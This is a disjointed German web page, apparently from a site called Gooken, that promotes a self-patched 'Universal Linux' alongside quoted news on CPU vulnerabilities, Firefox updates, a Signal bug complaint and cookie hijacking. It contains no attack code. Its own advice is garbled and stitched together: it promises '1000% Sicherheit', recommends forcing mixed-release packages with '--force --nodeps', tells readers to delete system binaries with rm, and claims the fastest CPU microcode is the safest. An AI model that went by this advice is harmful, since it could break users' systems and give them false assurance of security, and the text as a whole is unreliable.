es 14 wichtige Dinge, die Sie beachten sollten. Sonst drohen unangenehme Überraschungen. https://www.pcwelt.de/ratgeber/tipp-pc-selbst-bau-fehler-vermeiden-10834772.html Aufbruch in eine bad, bad world... Laut Saturn-Service-Center: Zusammenbauen - Bios-Setup - Überspielen (am besten partitionsweise oder vollständig mit dem UNIX/Linux-Befehl dd) oder: Partitionieren - Formatieren (Linux-Dateisystem, meist ext4) - Verschlüsseln (vieler Partitionen) - Installieren - Konfigurieren - Defragmentieren (entfällt bei Linux) - Updaten: Legen Sie nun die Installations-DVD ins Laufwerk, um das Betriebssystem und zugehörige Software zu installieren. Wir gehen künftig am liebsten vom rpm-(Paketmanager)-basierten Enterprise Linux (RHEL, Fedora, CentOS oder Scientific Linux) oder einem Mandriva-Derivat (PC Linux OS, Rosa, Mageia, Mandriva) aus, beziehen uns meistens aber auch auf Debian Linux usw. und (indirekt) MS Windows! Installations-Anweisungen erfolgen dabei von DVD bzw. anderen Installationsmedien wie USB-Speicherstift. Soweit Installation. Alle weiteren Schritte zunächst nach Hersteller-Vorgaben und Handbüchern, später im Folgenden! Für die Partitionierung, unter Linux formal in der Gerätedatei /etc/fstab) empfehlen wir vorab mindestens 80 GB für die Root- und 20 GB für die Home-Partition, um die 1 GB für die Boot-Partition und das Dreifache des RAM für die SWAP-Partition (Speicher-Auslagerungsdatei). Mitunter kann schon jetzt alles (alle Partitionen außer /boot ) verschlüsselt werden. Auf die Verschlüselung kommen wir aber noch ausführlich zu sprechen. Jahr 2009/2010: Alles für den Computer ist gelaufen (nur noch Updaten)! Das gibts mit uns, Gooken, wirklich! Computern ohne Risiken! Notice: IP2Location C library enables the user to get the country, region, city, coordinates, ZIP code, time zone, ISP, domain name, connection type, area code, weather info, mobile carrier, elevation and usage type from any IP address or hostname. This library has been optimized for speed and memory utilization. The library contains API to query all IP2Location LITE and commercial binary databases. Users can download the latest LITE database from IP2Location web site using e.g. the included downloader. https://fr2.rpmfind.net Dabei lässt sich neben Anti-Canvas-Fingerprinting und dem Wechsel der Browser-Kennung mit Proxies wie TOR und oder möglicherweise VPN (Virtual Private Networking) die IP und DNS-Information zumindest anonymisieren! Eine zentrale Rolle für 1000% Sicherheit übernimmt im Folgenden das Linux-Dateisystem (wie btrfs und ext4), IP-Anonymisierung mit Tor (Tor-Browser) und unsere iptables- and ebtables- Firewall linfw3! Außerdem möchten wir Ihnen insbesonders bei der Auswahl der Computer-Hardware, der Konfiguration von UNIX/Linux und Auswahl der sicheren Tor-Nodes (Entry Guards und Exit Nodes bzw. Relais) auf unseren Webseiten wie sogar News&Links behilflich sein! Für Suchen aller Art steht Ihnen dann immer noch unsere sichere Suchmaschine Gooken zur freien Verfügung. Dabei staut sich allein in News&Links eine bereits zuvor überall freigegebene Unmenge an mehr als aussagekräftigem Material aus bekanntlich besten und allerbesten Quellenan, längst genug und immer mehr, gegen Land (insbesonders wohl USA), Firmen und verantwortliche Kreise und Leute was zu tun, gegen sie vorzugehen und, wie seit Jahrzehnten längst die tiefe, tiefe Realität, sogar bzw. immer wieder prozesslich (vor Gericht)! Nehmen Sie dabei bitte unbedingt unseren generellen Haftungsausschluss (siehe auch Disclaimer) zur Kenntnis! Soweit unsere Kurzvorstellung von Gooken! IT-Sicherheit ist das oder eine Art "Spiel" um das möglichst hohe IT-Sicherheitsniveau. Ziel ist, dem Suneaten des bö,sen Suneaters (Computer) zu entkommen, indem man ihn in einen echten Computer verwandelt - einschließlich all dessen Verbindungen im Computernetz... ( fragt uns nicht, wer dieses "Spiel" strenggenommen mittlerweile schon alles in Person verloren hat... ). Wir spielen es künftig in Manier des bekannten Spiels "Mensch-ärger-Dich-nicht" - grüner Haken für grüner Haken Wir, Gooken, stellen Ihnen auf dieser Webseite das 10 Jahre und länger geupdatete "Universal Linux" auf Basis von insbesonders Enterprise Linux 6, 7, 8, ... ( RHEL 6 / Fedora Core / CentOS 6 (same for CentOS 7 / Scientific Linux 6 resp. 7 ) und Mandriva-Derviaten (Mandriva2010.2-2012, Mageia (1-7), Rosa2014.1, 2016.1, PC Linux OS (pclos)), Slackware (slack 14.2) und OpenSuSE (Thumbleweed, 15.2, 15.1, 15.0) u.a. mit dem KDE-Desktop-Environment (KDE) vor - das 1000% sicher gemachte Computersystem voller flächendeckender, prototypischer, meist rpm-basierter Anwendungen einschließlich Emulatoren vieler auf anderen Betriebssystemen laufender Software samt zugehöriger mausklick-schneller Lifetime-Hardware auf Basis extrem niedriger Kosten, siehe unter Datenblatt Menü links. gtk3 (el7): gtk3 (el7, rpm -i --force --nodeps), cairo ( el7, rpm -U --force, cairo-gobject (el7), glib2 (el7, beneath glib2 (el6) by rpm -i --force --nodeps), libepoxy (el6, el7), libxkbcommon (el7, rpm -i --force), fontconfig (el7), fribidi (el7), gdk-pixbuf2 (el7), glib2 (el7), harfbuzz (el7), jasper (el7), jasper-libs (el7), libblkid (el7), libexpoxy (el7), libjpeg-turbo (el7), libpng15 (el7), libmount (el7), uuid (el7), libuuid (el7), libwayland-client (el7), libwayland-curser (el7), libwayland-egl (el7), libxkbcommon (el7), libthai (el7), pango (el7), rest (el7) and zlib (el7). pango (el7) won´t let work drakconf (mdv2010.1), file-roller (el6) and palemoon for example. In diesem Fall behalte die alten libpango (el6), indem auf libpango aus pango (el7) verzichtet (nicht instaliert) wird, eventuell das Gleiche für libgobject und libgio aus glib2 (el7) und libgdk_pixbuf2 aus libgdk_pixbuf2 (el7). If you have problems installing glib2 and gtk3, enpack the rpms and copy their includes (directories and files) manually into the pregiven directories by the command "cp -axf". Um CentOS 7 / SL 7 möglichst nahezustehen, kann man auf CentOS 6 außerdem noch systemd (el7) installieren... (doch nur, weils stimmt, .... oder?) Linux - time before Gooken´s "Universal Linux ( in main: Enterprise Linux CentOS 6 resp. Scientific Linux 6 from year 2010 with updates to 2020 and longer )" "Thanks, Linux": You have made Microsoft rich!, Gooken.de: Alles rund um MAC OSX und Linux, http://www.trojaner-board.de/sitemap/f-13.html: BUUUäääääH! Das is ja genau so´n Mist wie Windoof... :( wo ist mein müll? Umstieg auf Linux Mint - Bildschirmfarben -alles vergraut Qnap über Apache Server gehackt Offen Verschieben technisch durchführbar? Safari kann nicht beendet werden Mac / Systemeinstellungen stürzen ab / Passwörter geändert / nach Malware Infektion MAC 10.6.8: langsame Bootzeit & HDDLüfter overdrive Word stürzt ab, Passwörter gelöscht, Schriftensammlung Probleme Offen Linux Kodachi Einstieg in die Linux-Welt ubuntu-16.04.1-desktop-amd64.iso ( 1,4 GB ) ? Auf Linux umsteigen Offen Trojanerbefall beim Mac? Offen install Whizz script.... Offen Der super gau virus ? BadBios? Malware oder Virus und wie entfernen Jemand kauft bei 1&1 mit meinen Zugangsdaten ein - Jemand ähnliche Erfahrung gemacht? MacBook Pro 2010 sehr langsam Frage an die Crypto-Experten: Daten aus Luks-Container wiederherstellen Rechner nach update auf 10.11.6 sehr langsam Offen Ein Altrechner mal wieder etwas fluffiger machen Virus googleads auf Macbook Ebay-Spam: Mail von Anwaltskanzlei Ebay GmbH Dual Boot unter Win 8.1 möglich ? Online Pay 24 ZIP Datei auf dem iPhone 6 angeklickt - Gefahr für den Mac? Offen ZIP Virusmail auf iPhone und Mac geöffnet Linux Ubuntu für XP Laptop Offen Ist mein Mac infiziert? Versteckter Trojaner möglich? Bekomme gerade unmengen an Virenmeldungen Habe ich einen Trojaner und kann dieser an meinen Schlüsselbund ran? Gibt es aktuell Trojaner für OSX iOS, die nicht gefunden werden? Welchen VPN-Service? Virenscanner- und Firewall Empfehlung für Mac iMac Intel Core 2 Duo 3Gh Mac mit einer .com codierungs Datei infiziert Mac Book Pro - "JS:ScriptSH-inf(Trj)" und "VBS:Bicololo-BM(Trj)"gefunden Archlinux / dhcpcd Offen Linux für alten PC Linux-Distribution für alten Laptop ... Fortsetzung des nahezu endlos langen Listings: https://www.trojaner-board.de#MAC_and_Linux-Troubleshooting News&Links#Computer Newsgroup: alt.linux.suse Exkurs#Universal_Linux_by_Gooken Listing für MS Windows: News&Links#MS_Windows _Troubleshooting (doch nur, weils stimmt, .... oder?)oden für Verschwörungstheorien. So wird behauptet, Bill Gates würde von dem Ausbruch profitieren. [...] So veranlassen im Internet auffindbare Patente auf Coronaviren Autoren diverser Posts und Artikel zu der Mutmaßung, das nun ausgebrochene Virus sei in Laboren entwickelt und ausgesetzt worden, um Impfungen zu vermarkten. Tatsächlich existieren Patente auf bestimmte Gensequenzen der Coronaviren. Allerdings sind die Corona eine große Familie von Viren - keines der Patente bezieht sich auf die neue in China aufgetretene Variante 2019-nCoV. Von News&Links#Computer Enterprise Linux 6 und 7 (CentOS 6, 7 resp. Scientific Linux 6,7) package installer: rpm, MMC#install_and_remove_software, packagekit, urpmi, smart-gui, smart, fedpkg, fedora-packager, file-roller, ..., for Debian: dpkg, dselect, apt, aptitude, debmirror (el6), debbuild (el6), ... NSA´s MORECOWBELL: Even the most basic internet architecture is compromised, awp.is, 24.01.2015 DNS has always been an open book and MORECOWBELL is the program the NSA has developed exclusively to read it. As the leaked slides show, the system allows the agency to monitor the availability of sites and web services, changes in content and a wide array of metadata, that can help it build complete profiles for targeted users. If necessary, it can even be used to find weak points for launching direct attacks. Given the widespread use of DNS in the public internet, the implications of this program are huge, as it affects users on a global level. https://data.awp.is/international/2015/01/24/20.html Beim letzten Update vor wenigen Tagen habe ich folgendes festgestellt ... unter System - Sicherheit ... sämtliche Schritte, die man tätigt, jede Seite, auch außerhalb des www...., wird im Hintergrund abgespeichert, mit Zeit und Ort !, Pia Berling @ krone.at, 24.11.2020 In die Systemeinstellungen gehen und sämtliche Häkchen deaktivieren! Dann unter dem Aktionsverlauf, der u.a. mit Googlekonto vernetzt ist, löschen! Dennoch ist es keine Garantie dafür, dass nicht trotzdem komplette Verfolgung Eurer Tätigkeiten erfolgt... zumindest hat man wenigstens etwas unternommen. Meiner Meinung nach die totale Überwachung... Cortana deaktivieren (Linux-Entsprechung wäre krunner und akonadi -> Inhalte von akonadi mit akonaditray) ... (habe ich schon ewig), Kameras abstecken, nur wenn wirklich benötigt! ... usw. ... https://www.krone.at/2282872 Auch bei Linux KDE (el6, 4.3 und mdv 4.4.5/4.4.9) kann der Aufgabenbereich von akonadi per akonaditray zumindest eingeschränkt und der für die Kontext-Desktop-Suche bei fast allen Aktionen des Benutzers recht aktive krunner vorsichtshalber ganz entfernt werden, indem /usr/bin/krunner einfach mit dem Befehl rm gelöscht wird. Allerdings lässt sich dann der graphische Prozessmanager von Linux nicht mehr mitttels den Tasten ESC + STRG aufrufen. Man richte ein neues Shortcut ein und/oder kopiere den Starter für dieses Programm "ksysguard %U" aus dem Startmenü, Sektion Werkzeuge oder Systeminformation einfach in die KDE-Kontrollleiste. Weiteres Manko: Beim Öffnen (Starten eines Programmes bzw. Öffnen eines Dokuments) per Mausklick erscheint am Mauszeiger keine Eieruhr oder desgleichen mehr, ggfls. neu einrichten! Sieht man davon ab, kann die Aufruf-Datei von krunner ruhigen Gewissens gelöscht werden. Wird akonadi deaktiviert, versendet das beliebte kmail leider keine E-Mail mehr! Auch ein Blick auf all die Einträge in der von krunner und akonadi verwalteten MySQL-Datenbank kann sich nun lohnen... Angebliche Sicherheitslücken in aktuellen AMD-CPUs entdeckt, linux.news.de, 22.03.2018 Vor wenigen Tagen machte eine Meldung die Runde, die sehr an Meltdown und Spectre erinnerte. Die bis dahin unbekannte israelische Sicherheitsfirma CTS-Labs Research berichtete über 13 angebliche Lücken in AMDs aktuellen Desktop- und Server-Prozessoren. https://linuxnews.de/2018/03/amd-sicherheitsluecken-in-ryzen-und-epyc-bestaetigt/ Detaillierter, präziser Check: spectre-meltdown-checker (el6) bzw. meltdown-spectre-checker (el6) Lösung/Abhilfe: das Sicherheitskonzept (Exkurs); das für Microcode, Kernelversion, Gerätetreibern und CPU verhilft hingegen meist nur teilweise und dabei oft lediglich problemmindernd: Microcode mit unserem alten Intel® Celeron in einen schnellen Risc-Processor "verwandelndes" ucode-intel oder microcode_ctl ( kann mit seiner "Entschärfung" die CPU nicht schnell genug laufen lassen (!); lassen Sie sich nicht von anderen Versionen beirren: superschnelles (rosa2021.1, rosa2016.1, el8, el7, el6: microcode_ctl-1.17-33.23.el6_10.x86_64.rpm, fc29: ver. 2.1-33 und neuerdings auch OpenSuSE 15.4 mit ucode-intel), wir empfehlen das mausklick-schnelle microcode_ctl (läft vorraussichtlich am sichersten, weil am schnellsten: rosa2021.1, rosa2016.1, el9, el8) über microcode_ctl (el6), Installation mit rpm -i --force über el6) oder alternativ ucode_intel ( OpenSuSE Thumbleweed, 15.5, 15.4, 15.3, 15.2, 15.1, 15.0 ) und aktuellem kernel-5.4 (pclos) oder kernel 4.21 (pclos) oder >= 4.21 / 5 Unser Tipp: Nehmen Sie die CPU am schnellsten arbeiten lassende Version! Mit dieser Version vom 22.05.2023 nach recht vielen der letzten Jahre läuft er (bei uns der Celeron vom Mini-ITX-220, siehe Datenblatt) ja sogar noch schneller als mausklick-schnell: Wieder alles fast so schnell wie vor all diesen microcode_ctl-Updates!: microcode_ctl-20230214-1.el9.noarch.rpm Oder, Pardon: Probieren Sie doch mal SuSE Thumbleweed from March 2024: ucode-intel-20240312-1.2.x86_64.html Microcode Updates for Intel x86/x86-64 CPUs OpenSuSE Tumbleweed for x86_64 ucode-intel-20240312-1.2.x86_64.rpm Clean up your Linux-System, by making as many programs run as possible. Solve dependencies, look out for any missing library, clear up different versions of perl and python and so on. Gorgeous! With this ucode-intel processors equal or higer Celeron run even faster than already mouseclick-fast right before! Start microcode_ctl (z.B. in /etc/rc.local) und/oder: automatisch mit dem Boot des Systems: Nach der Installation sollte die Boot-Partition (der im Rahmen des FSE (Full Disk Encryption) hoffentlich verschlüsselten Root- und Home-Partition usw.) mit "mount -o remount rw /boot" entsperrt werden, um dracut (el6) das neue microcode_ctl mit "dracut -f /boot/initramfs-... kernel-module-version" in /boot/initramfs... zu integrieren und/oder echo 1 > /sys/devices/system/cpu/microcode/reload sh /usr/libexec/microcode_ctl/reload_microcode ... oder selbsttätig per im Paket mitgelieferter udev-rules-Datei. Alternativ: microcode_ctl -qu Und von unserem Eindruck her mausklickschnell nicht nur nachts (21.00 bis ca. 06.00 Uhr, in einer Zeit, in der so einige Server unselten abgeschaltet sind): microcode_ctl (el8, von Juli 2022) über microcode_ctl (el6). Bitte vergessen Sie nicht, Linux wie in unserer Sektion "Universal Linux" beschrieben duirch Aktualisierungen auf einen sicheren Stand zu bringen! Firewall Linfw3: Zur generellen Verhinderung von Auslesen durch Treiber, hier über Spectre und Meltdown: Zulassung des Netzverkehrs nur für den einzig zuzulassenden Benutzer namens "surfuser" mit Surf-Gruppe "surfgruppe" mit Zuweisung der Gruppe wie z.B. "nobody" zu dessen Primärgruppe! Linfw3 lässt also nur Benutzer "surfuser" mit dessen Gruppe "surfgruppe" (anstatt dessen Primärgruppe "nobody") fürs Online zu. Dabei wird mit Linfw3 selbst root (UID: root bzw. 0, GID: root bzw. 0) gesperrt. Um paranoid zu sichern, damit die Verwirrung für den Kernel und CPU perfekt wird, alle Gruppennamen an Verzeichnissen und Dateien von surfuser (Benutzer mit Primärgruppe "nobody") noch auf "nobody" (anstelle surfgroup) setzen! Spectre und Meltdown: Die CPU-Bugs sind noch lange nicht ausgestanden, CHIP, 18.03.2018 Anfang des Jahres machten spektakuläre Bugs in Prozessoren die Runde, dazu kamen Update-Pannen der Hersteller und auch Microsoft hat sich nicht gerade mit Ruhm bekleckert. Zwar ist das Interesse an den Sicherheitslücken verebbt, abhaken sollte man das Thema aber nicht. Das Jahr 2018 ging mit den großen Sicherheitslücken Spectre und Meltdown los. Technische Details zu den teilweise sehr komplexen Lücken in Prozessoren waren schnell bekannt, doch das Schließen der Lücken macht bis heute Schwierigkeiten. Das Hauptproblem ist, dass man die Lücken nicht an einer Stelle beheben kann, sondern mehrere Stellen Input liefern müssen. Beteiligt sind CPU-Hersteller, aber auch Betriebssystem-Macher, Anwendungs-Programmierer und Treiber-Entwickler. Pannenserie bei IT-Giganten Fortsetzung des Berichts: News&Links#Computer Software::Security Weitere Sicherheitslücken in Intel-Prozessoren, PRO LINUX, 13.11.2019 Drei neu bekanntgegebene Sicherheitslücken in Intel-Prozessoren haben zu einer Welle von Aktualisierungen des Linux-Kernels, des Intel-Microcodes und anderer Software geführt. Zusätzlich wurden zwei Probleme im i915-Grafikprozessor publiziert. Nach Ablauf des Embargos wurden gestern Details zu drei neuen Sicherheitslücken in Intel-Prozessoren bekannt gegeben. Die Lücken sollen durch neue Ausgaben des Intel-Microcodes behoben werden. Als Sicherheitsmaßnahme für Prozessoren, die diese Aktualisierung nicht erhalten, wurden der Linux-Kernel, Xen, Qemu und andere Software aktualisiert. Intel stellt zudem neuen Microcode bereit, der zwar die Probleme behebt, aber zu weiteren Leistungseinbußen führt. Die erste Lücke nennt sich TSX Asynchronous Abort (TAA) und ermöglicht, ähnlich wie Spectre, das Auslesen von Daten, auf die ein Prozess normalerweise nicht zugreifen dürfte. Der Patch für Linux erklärt das Problem im Detail. Es betrifft Prozessoren, die die Intel Transactional Synchronization Extensions (TSX) unterstützen. Die CVE-Nummer ist CVE-2019-11135. Der Patch für Linux fügt dem Kernel die komplette Erkennung und verschiedene Methoden zur Abmilderung des Problems sowie Einstellmöglichkeiten hinzu, analog zu den Maßnahmen gegen Spectre. TSX selbst war schon in der Vergangenheit die Quelle einer Reihe von Problemen und wurde von Intel im Zuge von Microcode-Updates deaktiviert. In neuen Prozessoren wurde es wieder aktiviert, ein neuerliches Update wird es wohl es wieder deaktivieren oder abschaltbar machen. Die zweite Sicherheitslücke wurde iTLB multihit genannt und die CVE-Nummer CVE-2018-12207 vergeben, unter der bis heute keine Beschreibung zu sehen ist. Auch hier gibt der Linux-Patch die wohl genaueste Erklärung. Bei iTLB multihit handelt es sich demzufolge um einen Fehler, der auftreten kann, wenn das Laden von Instruktionen mehrere Einträge im Instruktions-TLB nutzt. Dazu kann es kommen, wenn sich die Speicherseitengröße ändert, beispielsweise wenn eine Aufteilung einer großen Seite in 4 Kilobyte große Seiten nötig wird. Dabei kann sich der Prozessor komplett aufhängen. Es ist daher möglich, beispielsweise aus einer virtuellen Maschine heraus, einen Denial-of-Service-Angriff auf das Host-System auszuführen. Betroffen sind die meisten Intel Core- und Xeon-Prozessoren. Die Abhilfe im Kernel besteht daraus, bei Seiten mit ausführbarem Code keine großen Seiten mehr zuzulassen, so dass es nie zu einer Aufteilung kommen kann. Ein dritter Fehler ist das "JCC-Problem", dessen Beschreibung bei Intel sehr dürftig ist. Unter bestimmten Umständen wird bei Sprunginstruktionen, die eine 64-Byte Ausrichtung überschreiten, etwas Falsches aus einem Cache gelesen, was zu undefiniertem Verhalten bei der Ausführung der Instruktion führt. Es steht ein Update des Microcodes von Intel zur Verfügung, das aber laut Phoronix die Prozessorleistung senkt. Für den GNU Assembler gibt es Patches, die das Problem möglicherweise effizienter lösen, betroffene Software muss damit aber neu compiliert werden. Wie Ubuntu ferner meldet, wurden auch zwei Sicherheitslücken in Intels i915-Grafikprozessoren veröffentlicht. CVE-2019-0155 ermöglicht es einem unprivilegierten Benutzer, seine Privilegien zu erhöhen und Daten aus dem Kernel auszulesen. CVE-2019-0154 dagegen kann zu einem kompletten Aufhängen des Systems führen. Die Behebung besteht in einer Kombination von Firmware- und Treiber-Updates. https://www.pro-linux.de/news/1/27587/weitere-sicherheitsl%C3%BCcken-in-intel-prozessoren.html Gooken empfiehlt den sicheren Messenger Ginlo von der Deutschen Post AG für Android ab Version 5 [ Next Signal messenger error got solved in version 5.34.10 ], Gooken, 11.04.2022 From: Gooken To: Developer of messanger Signal (USA) Permanent Signal Error Report all versions since October 2021 up to now, Gooken, 15.01.2022 - 25.03.2022 All actual Signal versions (up from October 2021) do not delete/remove and share any messages and further on upon our Android 4.4.2 - Smartphone armabiV7a anymore, belonging menu always leads into crash followed by a restart of Signal. We mailed this several times to you and also delivered the error log with all the system information to youi as you postulated so much from us. So why don´t you patch it to make it work again it already did before? And why do elder versions only run just for some days giving the hint to download the actual version? What the hell do you patch within the many, many updates you always provide? As Signal should run up from Android 4.4+, as you published everywhere for it´s system requirements, do not force us all the time to buy a newer Smartphone with a more actual Android anymore. And do not let us download all your so called patched newer versions with more than scrappy 40 MB full of suspicous code each apk! Versions before end of October 2021 do indicate only working for some days (about one or two weeks) for considering themself as too old. What I mean is, Signal does neither share, nor delete nor ... messages anymore upon Android 4.4.2 resp. 4.4.4. The menu crashes each election! WhatsApp´s and a lot of Apps on my Smartphone and many Linux on my Computer is working fine - how can it happen? Regards, Gooken We have sent several Signal-debug-protocols to the developers, but they still didn´r patch it. Wir meinen: Alle Browser haben ab sofort ausgedient: Sicherer und besser gehts nicht! Smartphone mit Orbot (Tor-Proxy) und PrivacyBrowser oder Tor Browser (Firefox 78.5.0, el6, rpm.pbone.net, gepatcht mit Firefox-78.9.0 außer libxul.so) oder ( unserer Meinung nach noch sicherer und besser ) Pale Moon 32.0.1 (pclos, palemoon.org mit nss(el8) statt nss (Pale Moon) außer libsoftokn.so ()(64bit), hingegen nicht Pale Moon Version wie 31.0.0, da Mausklicks in das Menül neue Verzögerungen (Delays) bewirken !), allesamt auf Tor Via Browser made in PRC für Smartphones, einfach sagenhaft:
December, the 07 2021: One more errata: All Signal messenger version since October 2021 do not enable user to mark out and delete messages anymore. Instead, signal quit crashes. This was found out upon Android 4.4. What&s happened? Dear reader, please contact this developer too! BSI warnt vor Firefox &Thunderbird: Updates stopfen gleich mehrere Sicherheitslücken, CHIP, 19.11.2020 Mozilla hat mit den aktuellen Updates für den Browser Firefox und den Mail-Client Thunderbird mehrere Sicherheitslücken geschlossen, vor denen das BSI warnt. Wir empfehlen Ihnen dringend, beide Programme möglichst bald auf die neueste Version upzudaten. https://www.chip.de/news/BSI-warnt-vor-Firefox-und-Thunderbird-Updates- stopfen-gleich-mehrere-Sicherheitsluecken_104405834.html Firefox (64 Bit) 74.0 Final Jetzt kostenlos bei CHIP zum Download: die brandaktuelle finale Version von Firefox 74.0. CHIP Bewertung: Sehr gut https://www.chip.de/news/Browser-im-Maerz-2020-Firefox-stuerzt-ab_169898532.html Nächstes Zwischen-Update für Firefox 78: Firefox 78.0.2 steht zum Download bereit, CHIP, 09.07.2020 Erst letzte Woche hatte Mozilla planmäßig Firefox 78 zum Download bereitgestellt. Doch es trat eine Nebenwirkung im Zusammenhang mit Suchmaschinen auf, woraufhin die Verteilung gestoppt wurde. Firefox 78.0.1 hatte das Problem behoben. Jetzt steht mit Firefox 78.0.2 das nächste Zwischen-Update an, das unter anderem ein Problem mit Microsoft Teams behebt. https://www.chip.de/news/Firefox-78-gestoppt-Mini-Update-Firefox-78.0.2-ist-da_182759007.html Firefox 78.5.0 (el6, rpm.pbone.net, gepatcht mit Firefox-78.9.0 außer libxul.so) Beachte: Die Installations-Reihenfolge einiger der im Folgenden aufgelisteten Firefox-Erweiterungen sollte nicht vergessen werden: ABP (mit der (wildcard-*-basierten) Sicherheits-Filter-Regel "verboten ist, was nicht (explizit) erlaubt ist", Einzelheiten im Folgenden weiter unten) und/oder uBlock bzw. ABL für Pale Moon und/oder uMatrix) vor RequestPolicy(Block)Continued vor Noscript, PrivacyBadger und CanvasBlocker! Haken bei Firefox: Wie aus dem angebrochenem Schloss links neben der Adresszeile hervorgeht, setzt sich die Verschlüsselung vieler mit dem neuen TLS 1.3 verschlüsselter Webseiten mit obigem auf OpenSuSE gepatchten Firefox-ESR-52.9 zumindest auf unserem System (el6) leider nur schwach bzw. überhaupt nicht verschlüsselt um! Was ist unter OpenSuSE nur aus ihm gemacht worden (obige Patches)? Zur Zeit können wir auf fast allen Plattformen (alternativ) den auf Firefox (Quantum oder Gecko) basierenden Pale Moon mit analogen Erweiterungen (Extensions) auch für die Nutzung als Tor-Browser empfehlen: secret agent und/oder eclipsed moon, JavaScript-Toggle-Buttom, script-blocker, ABL (für AdblockPlus, ABP or abprime), ehprime (hide elements (any visible webside contents self-pointed out for the election per mouse leading into one more filter-rule for ABL resp abprime ), noscript und nMatrix, RequestPolicyBlock-Continued, Block Content Download (msdy), noscript (Version 5.1.9 aus dem rpm-Paket seamonkey-noscript (el8, el7)), PermissionsPlus (Erweiterung von about:permissions und für jede Webseite), Change-Referer-Button, HTTPS enforcer, about:config-explainer, signTextJS, Pure URL, Cookie-Permissions-Button, CanvasBlocker Legacy, JDecentral Eyes, No Resource URI Leak usw., am Schluss wie bei Firefox wieder unser "Torwart" Privacy Badger von der gemeinnützigen Electronic Frontier Foundation EFF Lassen Sie nicht zu, dass ein Cookie Ihre Online-Identität stiehlt: Einfache Schritte für mehr Sicherheit, uncut-news.ch, 08.11.2024 reclaimthenet In einer Welt, in der alles, von Einkaufsliste bis zu persönlichen Gedanken, irgendwo im digitalen Raum gespeichert ist, sollten wir alle unsere Privatsphäre fest im Griff haben. Doch die Realität sieht anders aus: Viele von uns bewegen sich im Internet wie mit einer schutzlosen Hotelschlüsselkarte - wir zeigen sie herum, lassen sie in Cafés liegen, und wenn sie jemand stiehlt? Pech gehabt. Genau hier kommt das Cookie-Hijacking ins Spiel - ein Cyber-Angriff, bei dem ein unsichtbarer Dieb bereit ist, Ihre persönlichsten Daten zu entwenden und dem Meistbietenden zu verkaufen. Was sind Cookies? Cookies sind wie der diskrete, aber neugierige Butler des Internets, der uns von Seite zu Seite begleitet und dafür sorgt, dass wir eingeloggt bleiben, während wir Bankgeschäfte erledigen, shoppen oder surfen. Anders als die süßen Naschereien sind Cookies in der digitalen Welt kleine Textdateien - Informationspakete, die Webserver auf Ihrem Gerät speichern, damit Sie sich nicht bei jedem Klick neu anmelden müssen. Doch lassen Sie sich nicht täuschen. Wie jeder fleißige Butler sehen Cookies alles, merken sich alles und machen es manchmal sogar zu einfach. Was sind Login-Cookies? Login-Cookies sind quasi die Speicherkarten für Websites. Wenn Sie sich bei einem Konto anmelden, erhält Ihr Browser vom Server eine sogenannte "Sitzungs-ID" in Form eines Cookies. Von nun an ist dieses Cookie Ihr persönlicher VIP-Pass, der dafür sorgt, dass die Website Sie bei jedem Klick auf eine neue Seite erkennt. Stellen Sie sich das vor wie ein Festivalarmband: Wenn Sie es tragen, sind Sie drin - ohne sind Sie nur ein weiterer Besucher, der erneut nachweisen muss, dass er dazugehört. Wie Login-Cookies funktionieren: Der Balanceakt der digitalen Identität Wie läuft das also ab? Es ist ein komplexer Prozess: Benutzeranmeldung: Sie geben Ihren Benutzernamen und Ihr Passwort ein. Der Server prüft und bestätigt, dass Sie es wirklich sind. Cookie-Erstellung: Nach erfolgreicher Anmeldung erzeugt der Server eine Sitzungs-ID und speichert sie in einem Cookie, das er Ihrem Browser übermittelt. Cookie-Aufbewahrung: Ihr Browser speichert das Cookie und präsentiert es jedes Mal, wenn Sie eine neue Seite der Website öffnen. Sitzungsüberprüfung: Der Server überprüft bei jedem Klick die Sitzungs-ID. Passt alles, bleibt der Zugang bestehen, ohne dass Sie sich erneut anmelden müssen. Sitzungsende: Die Sitzung endet, wenn Sie sich abmelden oder der Server das Cookie wegen Inaktivität löscht. Cookie-Begegnungen in der realen Welt: Praktische Beispiele Online-Banking: Wenn Sie sich in Ihr Bankkonto einloggen, übergibt der Server eine Sitzungs-ID in einem Login-Cookie an Ihren Browser. So können Sie ohne erneute Eingabe von Daten zwischen Seiten wechseln und Ihre Finanzen regeln. Melden Sie sich ab, wird das Cookie gelöscht und damit der Zugang zu Ihrem Konto gesperrt. E-Commerce: Wenn Sie durch eine Shopping-Seite stöbern, sorgt das Login-Cookie dafür, dass Ihr Warenkorb bleibt, auch wenn Sie abgelenkt werden. Das Cookie stellt sicher, dass Ihre Sitzung beim erneuten Aufrufen der Seite noch aktiv ist. Die Gefahr des Cookie-Hijackings: Wenn Hacker sich als Sie ausgeben Beim Cookie-Hijacking - oder technisch "Session-Hijacking" - wird ein Session-Cookie gestohlen. Damit kann ein Angreifer in Ihre Konten eindringen, Ihre Identität übernehmen und auf Ihre Kosten shoppen oder Schaden anrichten. Um die simple Methode zu verstehen, wie eine digitale Identität zur Spielwiese für Hacker wird, betrachten wir die Schritte, die sie unternehmen. Der Diebstahl: Den Schlüssel zum Königreich rauben Um das Cookie zu entwenden, müssen Angreifer erst einmal Zugriff darauf bekommen. Beispielsweise über ungesicherte öffentliche WLANs, die Hackern Zugang zu Ihren Daten ermöglichen. Oder durch Cross-Site Scripting (XSS), bei dem Hacker bösartigen Code in vertrauenswürdige Webseiten einfügen, um Besucher-Cookies zu stehlen. Zugriff auf Ihre Konten: Ein Einbruch ohne Passwort Sobald der Hijacker Ihr Cookie hat, ist es ihm möglich, sich als Sie einzuloggen, ohne ein Passwort zu benötigen. Die Website wird den Hacker als Sie erkennen und ihm Zugang zu all Ihren Daten gewähren. Ausbeutung: Ihr Leben als Spielwiese Mit dem Cookie kann der Dieb nun auf Ihre persönlichen Daten zugreifen, Ihre Konten plündern und unbefugte Einkäufe tätigen. Inzwischen ist Cookie-Hijacking nicht mehr nur ein Problem für Einzelpersonen, sondern auch für Unternehmen, da Kundenvertrauen und Datenschutz auf dem Spiel stehen. So schützen Sie sich Um sich vor Cookie-Hijacking zu schützen, helfen einige grundlegende Sicherheitsvorkehrungen: Verwenden Sie VPNs im öffentlichen WLAN, Aktivieren Sie die Zwei-Faktor-Authentifizierung, Seien Sie vorsichtig bei Links zu Angeboten von unbekannten Webseiten. Unternehmen sollten zudem auf strenge Sicherheitsprotokolle setzen, Cookie-Schutzmaßnahmen in ihre Infrastruktur einbauen und Kundendaten mit größter Sorgfalt behandeln. Fazit In der digitalen Welt ist Vertrauen eine gefährliche Illusion. Solange unsere digitalen Identitäten auf so zerbrechlichen Daten wie einem Session-Cookie basieren, bleiben wir alle 